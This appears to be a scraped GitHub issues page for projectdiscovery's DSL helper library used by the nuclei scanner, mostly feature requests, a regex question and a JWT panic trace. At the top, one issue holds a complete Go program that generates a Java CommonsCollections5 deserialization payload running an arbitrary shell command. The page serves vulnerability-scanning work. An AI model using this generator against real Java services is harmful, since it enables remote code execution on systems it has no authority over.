projectdiscovery / dsl Goto Github PK
View Code? Open in Web Editor NEWDSL engine
License: MIT License
DSL engine
License: MIT License
package main
import (
"bytes"
"encoding/hex"
_ "encoding/hex"
"fmt"
)
func main() {
//fmt.Println(generateCommonsCollections5Payload("touch /tmp/success666"))
fmt.Println(hex.EncodeToString(generateCommonsCollections5Payload("touch /tmp/success666")))
}
func generateCommonsCollections5Payload(cmd string) []byte {
buffer := &bytes.Buffer{}
prefix, _ := hex.DecodeString("aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000005574002679736f73657269616c2e7061796c6f6164732e436f6d6d6f6e73436f6c6c656374696f6e7335740018436f6d6d6f6e73436f6c6c656374696f6e73352e6a6176617400096765744f626a6563747371007e000b0000002f71007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a78737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b657971007e00014c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e003200000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00327371007e002b7571007e002f00000002707571007e002f00000000740006696e766f6b657571007e003200000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e002f7371007e002b757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000017400")
buffer.Write(prefix)
buffer.WriteString(string(rune(len(cmd))))
buffer.WriteString(cmd)
suffix, _ := hex.DecodeString("740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878")
buffer.Write(suffix)
return buffer.Bytes()
}
Add public_ip
helper to obtain the public facing ipv4
Most helper functions are deterministic (output remains the same with the same input), and a few of them might be invoked multiple times within the same template, introducing a lot of potential delay in elaboration (especially those involving network/disk activity - eg. jarm
with ten tls connections). The issue is about introducing an in-memory cache that stores with short TTL (e.g. 60 seconds) with a maximum capacity.
function_name(args_values...)
(note: a hashing function can be used due to the deterministic property) is present in the cache and still valid and in such case retrieve the value without recalculating the whole return value.Using compress/flate
package
It would be useful to add the following helpers:
to_proper(input string) string | Transforms the input into ProperCase characters | to_proper("hello") | Hello
Would be Useful for Fuzzing filenames/Usernames
From projectdiscovery/nuclei-templates#7493
I encountered a vulnerability in the system, which uses rsa encryption to encrypt the parameters during the login phase. During the vulnerability mining process, I already knew the public key used for encryption, but when I wrote the nuclei template, I couldn't find the calculation function related to rsa encryption. Is there any way i can implement this encryption process through the nuclei template
The encryption process is implemented using JSEncrypt,and encryption scheme is RSAES-PKCS1-V1_5
Add helper function to pick item at position n within slice boundaries
Please describe your feature request:
- DSL helper functions in nuclei should be migrated to dsl repo https://github.com/projectdiscovery/dsl
- Add documentation of new helper functions (jwt , json etc )
Describe the use case of this feature:
- DSL is imported in proxify and httpx and some helper functions that are available in nuclei are not available in them
- helper functions should be consistent across proxify,nuclei and httpx
https://twitter.com/_0xf4n9x_/status/1651455454395129856
reference: https://twitter.com/_0xf4n9x_/status/1651455102774050816
I continued to explore the generation of this session value and found that it is only valid for 24 hours, which means that the hard-coded session value in the template is not valid long enough, which will lead to a missed vulnerability detection.
Hi all, pls add UTF16 encoding (for powershell command)
thx.
example:
package main
import (
"encoding/base64"
"fmt"
"golang.org/x/text/encoding/unicode"
)
func PowerShell(script string) (string, error) {
uni := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM)
encoded, err := uni.NewEncoder().String(script)
if err != nil {
return "", err
}
return base64.StdEncoding.EncodeToString([]byte(encoded)), nil
}
func main(){
a,_ :=PowerShell("test")
fmt.Println(a)
}
How can I replicate the capabilities provided by the Python hmac.digest() function using Nuclei hmac helper function. As far as i see nuclei does not support hmac.digest.
Python Example
token=base64.b64encode(hmac.new(secret,data,"sha256").digest());
Nuclei
token={{base64(hmac("sha256",data,secret))}}
Is there a way to replicate python hmac.digest in nuclei.
When using the following code, nuclei 2.8.6 throws an error:
"regex('(?i)server: apache/\d', all_headers)"
Error occurred loading template servertokens.yaml: yaml: line 23: found unknown escape character
Why does this not work as expected? Does this need multiple backslashes? According to https://pkg.go.dev/regexp it should support \d
.
Only "regex('(?i)server: apache/[0-9]', all_headers)"
works.
Based on projectdiscovery/nuclei#3981 and projectdiscovery/nuclei#4015
The helper functions should retain same function signature for backward compatibility. Ideally they should be reusable as global functions within the engine itself as previously implemented with https://github.com/projectdiscovery/nebula in projectdiscovery/nuclei#914
Ref: https://docs.python.org/3/library/struct.html
Implemented at: https://github.com/Mzack9999/gostruct
id: test
variables:
json: |
{
"tt": "tt"
}
jwt: "{{generate_jwt(json)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
{{print_debug(jwt)}}
$ go run . -debug -verbose -duc -t test.yaml -u http://localhost:80
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.15
projectdiscovery.io
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x18c42ee]
goroutine 14 [running]:
github.com/kataras/jwt.encodeToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, {0xc0000f46e0, 0x156, 0x160}, {0x0?, 0x0?})
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/token.go:35 +0x8e
github.com/kataras/jwt.signToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, 0x0, {0x1e32e00?, 0xc000d60ae0?}, {0x0, 0x0}, {0x0, ...})
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:80 +0x10d
github.com/kataras/jwt.Sign(...)
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:35
github.com/projectdiscovery/dsl.init.0.func77({0xc000d78620, 0x1, 0x0?})
/home/marco/go/src/github.com/projectdiscovery/dsl/dsl.go:1077 +0x635
github.com/projectdiscovery/dsl.dslFunction.Exec({0x0, {0x2209fa4, 0xc}, 0x0, {0xc000544300, 0x1, 0x1}, 0x286b518}, {0xc000d78620, 0x1, ...})
/home/marco/go/src/github.com/projectdiscovery/dsl/func.go:54 +0x29c
github.com/Knetic/govaluate.planFunction.makeFunctionStage.func1({0xc0006ad900?, 0x1d7c2a0?}, {0x1d7c2a0, 0xc000d78300?}, {0x227bc26?, 0x412401?})
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/evaluationStage.go:245 +0xac
github.com/Knetic/govaluate.EvaluableExpression.evaluateStage({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc0006ad9a0, ...)
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:232 +0x59d
github.com/Knetic/govaluate.EvaluableExpression.Eval({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, {0x2b31700, ...})
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:163 +0x125
github.com/Knetic/govaluate.EvaluableExpression.Evaluate({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc000d609c0)
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:137 +0x94
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.evaluate({0xc000050150?, 0xc000d609c0?}, 0xc000ecf330?)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:61 +0x192
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.Evaluate(...)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:30
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*requestGenerator).Make(0xc0006ac140, {0x2b45aa0, 0xc0008ac0e0}, 0xc000d404b0, {0xc000050150?, 0x4127a5?}, 0xc000d604b0, 0xc000d60390)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/build_request.go:140 +0xb08
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults.func1({0xc000050150, 0x65}, 0xc?, 0x495eee?)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:365 +0x16d
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults(0xc00093a8c0, 0xc000d404b0, 0xc000d60390, 0xc000d603c0, 0xc000d4c140)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:451 +0x34c
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer.(*Executer).Execute(0xc00035e3a0, 0xc000d40498)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer/executer.go:94 +0x43e
github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2.1(0x1be1c87?, 0x0?, 0xc000d4e860)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:128 +0x289
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2 in goroutine 13
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:105 +0x4f1
exit status 2
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.